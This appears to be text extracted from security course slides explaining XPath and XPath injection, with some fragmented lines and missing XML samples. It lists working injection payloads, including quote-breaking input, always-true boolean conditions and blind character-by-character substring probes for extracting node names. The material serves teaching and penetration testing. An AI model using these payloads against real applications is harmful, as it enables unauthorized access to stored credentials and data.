13 XPath
13 XPath
13.2. XPath
13.4. Exploitation
The next line describes the root element of the document. XML
elements define the structure of the document and identify named
section of information. It is important to know that elements form a
document tree: in this specific case, <users> is the parent of all other
elements.
Note that all elements must have a closing tag and must be properly
nested.
The element above is a child node for the element user. This
time, the element does not contain a child. Instead, it contains
text.
You can consider this text as the value of the element. If you
consider a database structure, jason would be the text contained
in the table users, column user with id=1.
https://msdn.microsoft.com/en-us/library/ms256177(v=vs.110).aspx
https://www.w3.org/TR/xpath-30/
/users//username
XPath expression
XPath result
Element='<username>jason</username>'
Element='<username>chris</username>'
//user[@id='1']/username
XPath expression
XPath result
Element='<username>jason</username>'
• //: select all user elements no matter where they are in the
document
• username/text()='<USERNAME>': return only the element
with the username text value set to <USERNAME>
• and: Boolean operator
• password/text()='<PASSWORD>': return only the element
with the password text value set to <PASSWORD>
APOSTROPHE COMMA
' ,
used as string used to break
terminator integers, although any
character would work
After injecting the test payload, the attacker receives an error and,
from that, can glean that his input payload has broken the XPath
query.
The error message describes that the XPath query has been broken
by the input character ' .
The web application output will be different from the one returned
with a FALSE condition like 1=2.
For the next tests, we will use the same web application used
before, but this time the error messages are not displayed.
The goal of the attacker is to look for two payloads making the
XPath query respectively always TRUE and always FALSE.
Now, the attacker does not know the XPath query but can imagine
that it is something logical and similar to this:
//<someNode>[<someOtherNode>=<countryID>']
The web application has shown only one record, probably the first
or the last depending on the web applications server-side code.
999999 or 2=2
999999 or 1=2
999999 or 1=9
Generally, an XPath
authentication query
looks like the following:
A C D B
can be represented as:
• (A OR C) OR (D AND B)
A B C
can be represented as:
• (A AND B) OR (C)
Note that each time the condition is true, it means that the
character used is correct and we can then go on with the next
character.
• ...
• ' or substring(name(/*[1]),2,1)='s
<users>
…
</users>
To get the first character, the attacker must insert all the following
payload data until the TRUE condition is verified:
• ' or substring(name(/users/*[1]),1,1)= 'a
• ' or substring(name(/users/*[1]),1,1)= 'b
• ' or substring(name(/users/*[1]),1,1)= 'c
• ...
• ' or substring(name(/users/*[1]),1,1)='u
<users>
<user>
…
</user>
</users>
In our example, we will say that you know all the identifiers of the
nodes: users, user, username, password and how they appear
in the hierarchy.
/users/user[position()==$i]/username